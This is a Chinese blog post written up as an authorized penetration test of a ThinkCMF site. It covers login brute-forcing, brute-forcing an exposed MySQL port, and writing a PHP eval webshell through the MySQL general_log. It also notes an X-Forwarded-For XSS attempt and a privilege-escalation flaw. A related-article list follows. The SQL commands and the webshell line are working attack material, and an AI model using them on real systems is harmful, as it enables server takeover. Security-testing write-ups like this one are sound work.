【网络安全】一次授权的渗透测试
前言
前不久的一次授权测试中,感觉缺少任何一步都无法达到getshell的目的,单个漏洞看得话确实平平无奇,但是如果组合起来的话也许会有意想不到的化学效应。
【学习资料】
前期测试
拿到这个站的时候一眼就看见了会员登录界面,一开始想着注册,但是觉得会员功能应该很少,没验证码啥的,万一后台管理员也是会员呢那岂不是要是爆破出来了可以去后台尝试一波。
显示的是手机号登录,但是可以尝试下admin,千万不要被他的前台迷惑了。很巧的是可以进行用户名枚举,而且还存在admin账号,不爆破都对不起他
字典呢用的是鸭王的字典,爆破神器,用这个字典爆破出来过不少站点(https://github.com/TheKingOfDuck/fuzzDicts), 这次也很幸运,爆破出来了
拿到后台去登录下,管理员确实喜欢采用同样的密码,登录进去了。看到后台可以自定义上传的后缀心里想可以愉快的交差了,增加后缀php,找上传一条龙getshell。
当我看到上传图片的编辑器的时候我感觉事情并不是那么简单,果不其然那个增加后缀不起作用
后台发现是thinkcmf建站系统,网上搜索能利用的漏洞,看到一个漏洞集合(https://www.hacking8.com/bug-web/ThinkCMS/ThinkCMF%E6%BC%8F%E6%B4%9E%E5%85%A8%E9%9B%86%E5%92%8C.html) 挨个去尝试下无果,继续搜索(https://www.freebuf.com/vuls/217586.html), 基本上能尝试的都payload都试了试,应该是版本高漏洞修复了或者利用方式不太对,反正是没利用成功。有的方法对网站有破坏性,我要是试了不得被打死呀。既然到现在无法getshell,那就尝试找找漏洞吧,领导说的好如果无法getshell就多找漏洞,听领导的总没有错。
进阶阶段
在一开始打开网站的时候,由于安装了谷歌插件sensinfor(t00ls上发现的),可以初步探测网站的敏感目录,比如备份文件,phpmyadmin,phpinfo等等,在一开始就探测出存在phpinfo,获取了网站的绝对路径
常规用nmap探测下开放的端口,发现对外开放了3306端口,有绝对路径了,不抱希望的去爆破下3306吧,反正我是没爆破出几个3306的密码,用下超级弱口令检查工具,字典接着用鸭王的吧,谁知道是字典强大还是运气爆破,话说这个不算弱口令,只能说字典里有这个密码吧,只要字典存在的就是弱密码,没有错。
接下来就是常规操作了,试下log写日志吧
show variables like '%general%'; 查看日志状态
SET GLOBAL general_log='on' 开启日志读写
SET GLOBAL general_log_file='xxx.php' 指定日志路径
SELECT '<?php eval($_POST["cmd"]);?>' 写日志进xxx.php
其他漏洞
基于负责任的态度也发现了 一些其他的漏洞,不过相对来说危害性不大吧,但是如果在写测试报告的时候如果没得写也是可以写上的。
登录IP伪造
这个后台一般都有记录用户登录IP的习惯,但是如果记录IP的时候选取的是x-forward-for构造的IP,这样攻击者是可以伪造登录IP的,如果没有对IP的合法性进行校验,构造一个XSS payload触发存储型XSS这也不是没可能,在测试的时候就遇到过几次,后台记录会员登录IP的地方存在存储型XSS
不过这里美中不足的是后台对IP的合法性进行了校验,如果是不合法的IP会被重置为0.0.0.0
越权漏洞
登录后发现管理员没办法对自己进行操作,这很尴尬,管理员都没办法更改自己的信息
很简单的办法随便找个可以进行更改的链接,更改url实现修改管理员信息,按照经验这种限制管理员更改自己信息的情况我遇到的很多都是前端限制了。
然后会弹出详情页面,可以进行修改操作,这里修改下会员等级把自己从普通会员变成VIP吧,一个管理员怎么能是普通会员呢
总结
细看下来真的没啥技术含量,运气好爆破出来了,可以写log日志,但是也算是一环扣一环吧,如果不是一开始爆破出来了可能也没想着去爆破3306,如果没有绝对路径的话我也懒得去爆破3306,测试中运气也很重要呀,哈哈。
持续更新↓↓↓↓
【网络安全学习资料·攻略】
【网络安全】一次授权的渗透测试相关推荐
- [网络安全学习篇9]:渗透测试(千峰网络安全视频笔记 9 day)
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
- 【十年网络安全工程师整理】—100渗透测试工具使用方法介绍
渗透测试是指渗透人员在不同的位置(比如从内网.从外网等位置)利用各种手段对 某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告, 并提交给网络所有者.网络所有者根据渗透人员提供 ...
- 网络安全系列-VIII: 什么是渗透测试 Penetration Test?
什么是渗透测试? 概念及流程 渗透测试: Penetration Test, 是指用黑客的方式攻击你自己或客户的IT系统,来找到其中的安全漏洞.是安全评估的一种手段,目的是为了提高系统的安全性 渗透测 ...
- 笔试题————1、网络安全、Web安全、渗透测试笔试总结
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家.教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈-我正在学习中,觉得太牛了,所以分享给大家 ...
- 网络安全-《黑客秘笈渗透测试实用指南(第2版)》工具安装部分
后门制造工厂 ● Patch PE, ELF, Mach-O 二进制文件注入shellcode git clone https://github.com/secretsquirrel/the-back ...
- 江西省职业院校技能大赛中职组网络安全竞赛之Linux操作系统渗透测试
Linux操作系统渗透测试 (p10P120-经典赛题-Linux操作系统渗透测试 ) 任务环境说明: 服务器场景:环境可以私信博主 服务器场景操作系统:Linux(版本不详) (关闭连接) 可以爆破 ...
- 【渗透测试】一次授权的渗透测试——建议收藏
一:信息收集阶段 因为目标是学校,一般会去考虑收集学号,教工号.因为有的登陆点需要此类信息,且密码存在规律性(身份证后六位,123456). 目标域名xxx.com[查看资料] 开始的时候,我是直接通 ...
- 记一次有授权的渗透测试
点击关注了解更多精彩内容!! 今天基佬在群里发来一个国外的站然后让帮忙拿shell 话不多说,我迎众基去了. 第一反应找上传. 该处找到一个上传,我们新建一个然后上传.经过简单的测试直接00截断就可以 ...
- 2023年最新网络安全渗透测试工程师面试题合集,建议收藏!
注:做这个List的目标不是很全,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺. [一一帮助网络安全面试提升点我一一] ①网络安全学习路线 ②20份渗透测试电子书 ③安全攻 ...
最新文章
- 自行架设DNS的操作步骤及相关说明
- Runtime底层原理总结--反汇编分析消息转发
- 制作类似QQ截图软件
- iNeuOS工业互联网操作系统,提升分布式云端控制安全策略和增加实时日志功能...
- css hover变成手_web前端入门到实战:彻底掌握css动画「transition」
- java tcp聊天程序_java实现基于Tcp的socket聊天程序
- nvme装系统不能自引导_新买的固态硬盘用AHCI不能装系统,而用IDE却可以?问题就在这里...
- Win7系统电脑怎么设置桌面壁纸全屏显示
- 用计算机写高中数学程序框图,画“程序框图”,高中数学最实用基本技能之一...
- AMD64(x86_64)架构abi文档:中
- 安卓之旅第七站--实战演练之快给小宝宝买装备吧
- IDEA快捷键说明大全
- dp入门(01/28)
- Python报错:ImportError: attempted relative import with no known parent package
- oracle插入数字类型能用单引号括起来为什么
- int 和 Integer有什么区别,Integer 有哪些函数方法
- AD19 PCB板完整绘制过程(4层)
- 计算机网络的分类2:按网络覆盖范围分类,分为局域网、城域网、广域网
- jmeter具体操作
- 应用代码(3)——modbus模板(RTU消息帧)
热门文章
- Python之gmplot:gmplot库的简介、安装、使用方法之详细攻略
- DL之LSTM:tf.contrib.rnn.BasicLSTMCell(rnn_unit)函数的解读
- CV之LabelImg:图片标注工具之LabelImg(图像标注工具)的简介、安装、使用方法详细攻略
- 快速提高CSDN访问量 - 附脚本初代机
- 蓝桥杯算法训练_2的次幂表示+前缀表达式+Anagrams问题+出现次数最多的整数
- 代码审计_strcmp比较字符串
- ajax和jsonp
- 网络传输 中文乱码问题
- a, b = b, a+b
- Web打印的解决方案之普通报表打印